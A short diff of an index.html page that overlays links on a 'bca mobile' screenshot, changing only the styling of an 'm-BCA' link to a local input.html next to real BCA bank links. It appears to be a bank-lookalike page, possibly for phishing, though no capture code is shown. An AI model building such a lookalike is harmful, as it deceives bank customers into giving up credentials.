--- a/index.html
+++ b/index.html
@@ -11,7 +11,7 @@
 <body>
   <img style="z-index: 0" src="https://res.cloudinary.com/codelifings/image/upload/v1613358205/Tak_berjudul41_mnu1wt.jpg" alt="bca mobile">
   <div style="position: absolute; z-index: 1;">
-    <a href="input.html" style="position: absolute; margin-top: -150px; left: -50px; width: 100px; top: -10px; bottom: 0">m-BCA</a>
+    <a href="input.html" style="position: absolute; margin-top: -150px; background:red; left: -50px; width: 70px; top: -10px;">m-BCA</a>
     <a href="https://m.klikbca.com/login.jsp" style="position: absolute; top: -80px; left: -50px">KlikBCA</a>
     <a href="https://www.bca.co.id/promo?i=ddbccf03bb349e45f699f1a396a55b023a185b815ccfb33c1166015b462ffe85" style="position: absolute; width: 150px; left: -50px">Info BCA</a>
   </div>
